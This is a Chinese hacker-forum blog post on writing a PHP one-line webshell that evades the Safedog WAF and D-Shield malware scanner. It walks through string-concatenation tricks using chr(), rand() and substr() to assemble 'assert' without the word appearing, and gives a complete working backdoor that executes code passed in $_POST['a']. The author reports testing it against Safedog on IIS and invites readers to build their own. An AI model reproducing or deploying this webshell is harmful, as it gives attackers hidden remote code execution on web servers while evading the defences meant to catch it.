骚思路过安全狗和 D 盾 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

骚思路过安全狗和 D 盾

无法 动画教程

作者:铮铮 (红客帝国)

 

请尊重版权,盗版权者死全家

WAFbypass 我还是个渣,现在还是先从写过狗马子开始吧 ···

前言

距离上一次更新已经拖了 1 个多月了 ··· 主要是快考试了,疯狂补,还有一个原因就是 ··· 我 ··· 找不到素材 ···

image

所以,今天,来骗点访问量 (XD)

0x001 D 盾和安全狗

今天的目标是写一个过狗马子,绕过我们亲爱的 D 盾和安全狗

首先,了解一下 D 盾和安全狗的查杀

D 盾查杀会跟踪函数,比如

<?php $a="ea-vl";
$a($_PO-ST[a]); ?> 

在之前这是一个蛮有用的马子,他们只知道 $a 后门跟上了 ($_POST[a]),而“$a” 并不是什么危险函数(ev-al,ass-ert,sys-tem,ex-ec···)

可现在 D 盾会跟踪函数,$a="ev-al",ev-al($_POST[a]),立马报 5 级

安全狗对比 D 盾来说也差不多,两者各有优缺点,可我之前的一些过狗马,D 盾杀出来了,安全狗没有查出来,但就目前来说,安全狗使用的更广泛一些

0x002 编写前

#记录的是铮铮自己编写马子的过程 

首先,我们去膜拜一下前辈

image

可以看到前辈写的马,有一种是完全没有危险函数,仅仅用 2 个 POST 或者 2 个 GET 就构造出一句话木马,看起来是没问题了,可 D 盾有人工识别,老木马一棒子锤死,安全狗还会检查你 POST 的内容,GET 的内容,你带一个 assert 进去,分分钟把你 ban 到哭

所以主要用的是一个套路:拼接

何为拼接?$a="1"."2",echo $a, 得到 12

在摸索的过程中 我尝试拼接 eval

image

结果是 D 盾不报毒 ------ 因为根本就是一段无效代码!

php 中,有可拼接函数和不可拼接函数

通过字符串的拼接和转化来实现戳瞎狗眼和砸掉 D 盾,有点搞头

经测试,assert/preg_replace 支持拼接,然而 eval 不支持

那我们就用这些函数戳瞎狗眼,砸掉 D 盾

整理一下思路

1)GET和POST不能直接出现assert 2)不能直接拼接assert 3)preg_replace尽量不用,带上/e之后基本都会杀了
···· 

0x003 编写中

既然要避免被他抓到把柄,那我们整个马子不能出现一点点破绽,不仅是防带着盾的狗,还是防肉眼扫描

我打算利用 ascii 来绕过肉眼

image

$a 就等于 assert,虽然肉眼绕过了,但带着盾的狗还没有

当时我就想了个骚思路 既然 assert 可以拼接 那我们为什么不试试分 3 次拼接?

image

这就够了吗?Of course not

为了混淆带盾狗

我用上了 rand 函数

image
--- 某不透露姓名的百度百科先生

随机生成四个数夹杂在中间

然后再用 substr 取出我们要用的 assert 哇 很 lowb 的方法 ····· 但是只要能用就行了!

#在w3school找了个substr的例子,给你一个例子,自己体会 哈哈哈 
image

用跟刚才一样的套路,加上我们的 lowb 方法

<?php $a = chr(97).chr(115); //as $b = chr(115).chr(101); //se $c = $_GET['f']; //xx.php?f=rt $d = $a.$b.rand(1111,9999).$c;
$e = substr($d,0,4).substr($d,8,10); //先取出前面4位,再取出最后两位,拼接起来就是assert了 $e($_POST['a']);//当当,不说你也懂 ?> 

完工

这是没有加上 lowb 方法的时候

image

加上了以后

image

成功砸烂 D 盾

再来看看我们的狗

image

(废话 因为根本就没出现 assert)

所以 我还专门跑到虚拟机上测试这个马子是不是真的能用

搭建好 iis 开好安全狗

然后插进去

image

GG 狗阵亡

#只提供了思路,优化和精简就靠你们了!! 

0x004 小结

不得不说编写的过程十分的欢乐,不像这篇文章一样枯燥乏味(hhh 希望你不要这么认为),各种查阅资料,各种找 dalao,还重新翻了翻函数库,温故知新

PHP 的函数库是很丰富的,用你们炸天的大脑,用组合技,用连招,用各种骚思路写出能戳瞎狗眼和砸掉 D 盾的马子吧(写完了发我一份 ···?)

我会在最近写一篇关于回调后门的文章(没错,还是原创水文)

我会坚持更新原创文章

希望各位 dalao 能够和我一起交流

最后

作为一个好学生...

我的心愿是...

世界和平...

标签: 暂无标签

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表